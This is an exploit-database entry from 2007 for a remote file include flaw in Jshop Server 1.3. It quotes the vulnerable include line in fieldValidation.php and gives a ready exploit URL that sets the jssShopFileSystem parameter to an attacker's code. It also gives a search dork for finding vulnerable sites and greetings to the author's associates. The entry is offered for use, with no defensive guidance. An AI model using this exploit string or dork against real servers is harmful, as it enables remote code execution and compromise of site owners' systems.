Jshop Server 1.3 (fieldValidation.php) Remote File Include Vulnerability

2007-01-10T00:00:00
ID 1337DAY-ID-1381
Type zdt
Reporter irvian
Modified 2007-01-10T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ========================================================================
Jshop Server 1.3 (fieldValidation.php) Remote File Include Vulnerability
========================================================================



==========================================================================
# scripts       : Jshop Server 1.3
# Discovered By : irvian
# script        : http://www.jshop.co.uk/
# special To    : nyubi,ibnusina,arioo,jipank,kacung,trangkil,cah_gemblunkz
# dork          : powered by jshop
--------------------------------------------------------------------------
file: routines/fieldValidation.php

include($jssShopFileSystem."resources/includes/validations.php");


exploit : www.target.com/routines/fieldValidation.php?jssShopFileSystem=[evilcode]


#  0day.today [2018-02-13]  #